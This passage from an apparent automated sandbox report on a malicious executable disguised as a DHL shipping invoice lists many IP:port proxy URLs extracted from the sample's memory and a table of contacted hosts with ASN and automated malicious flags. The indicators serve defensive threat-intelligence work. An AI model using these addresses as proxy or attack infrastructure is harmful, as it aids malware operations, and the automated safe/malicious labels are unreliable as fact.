                            http://51.89.173.40:51612://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://125.25.40.3DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://43.134.20.174:15673DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://5.252.23.220:3128DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://104.21.6.88:80DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://176.99.DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://173.212.209.49:31673DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://136.239.176.66:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://50.145.6.36DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://162.241.79.22:50207://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://172.67.255.224://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://50.145.6.38DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://103.146.196.97:32650DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://46.101.19.131://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://50.145.6.32DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://103.28.121.58:3128://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://184.178.172.25:15291DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://50.169.135.10:80DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://38.50.130.93:5678DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://67.43.236.22:23927://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://113.160.16.142:5678://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://201.77.108.64:999DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://204.11.158.50:59886://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://203.128.77.213:33378DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://181.205.46.178:4666DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://27.0.234.206:1080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://31.170.53.140://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://23.108.42.155:8118DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://2.179.193.146:3128DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://98.64.169.17:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://103.90.227.244:3128DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://38.48.98.38:28080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://72.10.160.170:5385://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://117.54.114.101://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://27.44.32.188:53309DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://103.113.71.230:1080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://188.166.252.135:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://13.234.24.116:3128DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.131.203.7:8080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://173.212.237.43:64735://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://149.126.101.162:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://188.132.222.194:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://107.180.90.88:20309DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://1.0.0.84DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://139.255.94.122:39635DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://103.12.246.105:4145://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://183.88.184.48:8080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://43.153.177.137:13220DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://72.37.216.68:4145DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.99.138.162://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://72.10.164.178:2251DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://104.19.235.10DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://103.217.213.145:4145://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://111.59.4.88:9002://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://36.89.245.65:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://51.81.186.179:51405://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98161C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://183.234.215.11:8443://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://113.161.93.29:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://101.109.20.71:4145DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://72.10.160.90:7481DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://177.159.145.26:4153://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://92.205.110.118:15430DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://211.234.125.5:443DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://202.139.198.15:3060://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://3.73.120.104:3128://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://67.43.228.253:1487DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://157.230.226.230:1202://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://50.169.23.170:80DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://161.97.173.42:50386://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://94.45.152.86:48256://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://103.234.24.105:8880DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://104.17.166.210:80DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://106.0.62.70DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://47.91.65.23:3128DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://182.253.181.10:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://180.183.215.154:4153DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://84.241.8.234:8080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://162.214.170.144:31701DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://46.219.8.201:41890://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://50.168.210.239:80DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://185.129.250.183DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://45.174.87.18:999://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://50.231.110.26://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://203.170.146.146:4153DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813FE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://31.7.65.18:443://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://162.214.165.6:42624://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://193.30.13.18:999DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://52.172.1.186DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://37.26.223.96:9080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://35.207.123.94://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://185.49.31.207:8081://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://45.138.87.238:1080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://92.242.212.50:8080://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://203.81.67.22:8080DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://82.223.102.92:9443://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://212.110.188.216:34405://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://165.232.89.116:3128://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://31.217.213.227:8090://proxyDHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://206.42.40.0:5678DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            93.171.243.253
                            unknownCzech Republic
                            8870OVDC-ASUAfalse
                            38.127.172.200
                            unknownUnited States
                            174COGENT-174USfalse
                            212.110.188.202
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            24.230.33.96
                            unknownUnited States
                            11232MIDCO-NETUSfalse
                            64.157.16.43
                            unknownUnited States
                            3064AFFINITY-FTLUSfalse
                            183.165.245.47
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            182.160.100.156
                            unknownBangladesh
                            24323AAMRA-NETWORKS-AS-APaamranetworkslimitedBDfalse
                            50.169.37.50
                            unknownUnited States
                            7922COMCAST-7922USfalse
                            103.216.51.36
                            unknownCambodia
                            135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                            119.2.42.135
                            unknownIndonesia
                            38524LAXONET-AS-IDLaxoGlobalAksesPTIDfalse
                            51.15.139.15
                            unknownFrance
                            12876OnlineSASFRfalse
                            181.78.11.217
                            unknownArgentina
                            52468UFINETPANAMASAPAfalse
                            194.44.177.225
                            unknownUkraine
                            3255UARNET-ASUARNetUAfalse
                            89.168.121.175
                            unknownUnited Kingdom
                            9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                            181.78.11.218
                            unknownArgentina
                            52468UFINETPANAMASAPAfalse
                            85.237.62.189
                            unknownRussian Federation
                            12389ROSTELECOM-ASRUfalse
                            41.155.190.214
                            unknownEgypt
                            37069MOBINILEGfalse
                            13.234.24.116
                            unknownUnited States
                            16509AMAZON-02UStrue
                            139.255.193.243
                            unknownIndonesia
                            9905LINKNET-ID-APLinknetASNIDfalse
                            159.65.0.189
                            unknownUnited States
                            14061DIGITALOCEAN-ASNUSfalse
                            103.4.118.130
                            unknownBangladesh
                            38203ADNTELECOMLTD-BDADNTelecomLtdBDfalse
                            31.43.63.70
                            unknownUkraine
                            50581UTGUAfalse
                            103.74.229.133
                            unknownBangladesh
                            131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                            52.35.240.119
                            unknownUnited States
                            16509AMAZON-02USfalse
                            68.183.17.152
                            unknownUnited States
                            14061DIGITALOCEAN-ASNUSfalse
                            119.15.89.87
                            unknownCambodia
                            24492IIT-WICAM-AS-APWiCAMCorporationLtdKHfalse
                            103.25.210.102
                            unknownIndonesia
                            132653B-LINK-AS-IDPTTransdataSejahteraIDfalse
                            221.194.149.8
                            unknownChina
                            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                            146.19.106.42
                            unknownFrance
                            7726FITC-ASUSfalse
                            46.17.63.166
                            unknownUnited Kingdom
                            39326HSO-GROUPGBfalse
                            114.129.2.82
                            unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
                            62.171.131.101
                            unknownUnited Kingdom
                            51167CONTABODEtrue
                            216.74.255.182
                            unknownUnited States
                            11215LOGIXCOMM-ASUSfalse
                            103.79.96.218
                            unknownIndonesia
                            64308IDNIC-DATAON-AS-IDPTIndoDevNiagaInternetIDfalse
                            103.47.93.250
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            14.161.17.4
                            unknownViet Nam
                            45899VNPT-AS-VNVNPTCorpVNfalse
                            183.164.254.8
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            103.47.93.252
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            194.9.80.1
                            unknownunknown
                            206495IR-SADRA-20180529IRfalse
                            103.47.93.248
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            212.110.188.222
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            202.162.105.202
                            unknownSingapore
                            64050BCPL-SGBGPNETGlobalASNSGfalse
                            67.205.177.122
                            unknownUnited States
                            14061DIGITALOCEAN-ASNUSfalse
                            46.36.70.104
                            unknownLithuania
                            43627KLI-ASLTfalse
                            212.110.188.220
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            146.19.106.59
                            unknownFrance
                            7726FITC-ASUSfalse
                            67.213.210.115
                            unknownUnited States
                            32780HOSTINGSERVICES-INCUSfalse
                            109.123.254.43
                            unknownCzech Republic
                            15685CASABLANCA-ASInternetCollocationProviderCZfalse
                            172.67.200.220
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            50.233.240.87
                            unknownUnited States
                            7922COMCAST-7922USfalse
                            67.213.210.118
                            unknownUnited States
                            32780HOSTINGSERVICES-INCUSfalse
                            38.242.199.111
                            unknownUnited States
                            36336NATIXISUStrue
                            91.185.84.228
                            unknownRussian Federation
                            49816CMST-VOLGA-SIMBIRSKASRUfalse
                            74.103.66.15
                            unknownUnited States
                            701UUNETUSfalse
                            219.73.88.167
                            unknownHong Kong
                            4760HKTIMS-APHKTLimitedHKfalse
                            212.110.188.216
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            103.47.93.242
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            212.110.188.211
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            128.199.104.93
                            unknownUnited Kingdom
                            14061DIGITALOCEAN-ASNUSfalse
                            103.47.93.236
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            212.110.188.213
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            35.207.123.94
                            unknownUnited States
                            19527GOOGLE-2USfalse
                            183.215.23.242
                            unknownChina
                            56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                            103.189.96.98
                            unknownunknown
                            7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                            162.144.32.209
                            unknownUnited States
                            46606UNIFIEDLAYER-AS-1USfalse
                            148.72.23.56
                            unknownUnited States
                            26496AS-26496-GO-DADDY-COM-LLCUStrue
                            47.116.126.120
                            unknownChina
                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                            81.250.223.126
                            unknownFrance
                            3215FranceTelecom-OrangeFRfalse
                            218.252.244.126
                            unknownHong Kong
                            9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                            89.165.40.8
                            unknownIran (ISLAMIC Republic Of)
                            39501NGSASIRfalse
                            47.236.56.214
                            unknownUnited States
                            20115CHARTER-20115USfalse
                            103.47.93.233
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            191.101.1.116
                            unknownChile
                            61317ASDETUKhttpwwwheficedcomGBfalse
                            212.110.188.204
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            94.131.14.66
                            unknownUkraine
                            29632NASSIST-ASGItrue
                            103.47.93.231
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            212.110.188.207
                            unknownUnited Kingdom
                            35425BYTEMARK-ASGBtrue
                            23.111.102.153
                            unknownRussian Federation
                            7979SERVERS-COMUSfalse
                            103.47.93.223
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            113.74.26.116
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            113.74.26.114
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            5.190.220.235
                            unknownIran (ISLAMIC Republic Of)
                            58224TCIIRfalse
                            104.17.9.114
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            177.10.193.82
                            unknownBrazil
                            262854AFINETSOLUCOESEMTECNOLOGIADAINFORMACAOLTDABRfalse
                            20.33.5.27
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            200.174.198.95
                            unknownBrazil
                            4230CLAROSABRfalse
                            120.33.126.200
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            45.71.15.136
                            unknownBrazil
                            267595MILANINNETBRfalse
                            103.47.93.214
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            103.47.93.213
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            180.104.0.161
                            unknownChina
                            137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                            104.236.0.129
                            unknownUnited States
                            14061DIGITALOCEAN-ASNUSfalse
                            103.47.93.219
                            unknownIndia
                            9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                            181.209.117.51
                            unknownArgentina
                            52361ARSAT-EmpresaArgentinadeSolucionesSatelitalesSAARfalse
                            54.67.125.45
                            unknownUnited States
                            16509AMAZON-02USfalse
                            14.232.235.13
                            unknownViet Nam
                            45899VNPT-AS-VNVNPTCorpVNfalse
                            185.236.203.208
                            unknownRomania
                            9009M247GBfalse
                            24.106.221.230
                            unknownUnited States
                            11426TWC-11426-CAROLINASUSfalse
                            41.65.162.73
                            unknownEgypt
                            36992ETISALAT-MISREGfalse
                            114.231.45.81
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1407258
                            Start date and time:2024-03-12 08:36:06 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 3s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:DHL- Shipping invoice.exe
                            Detection:MAL
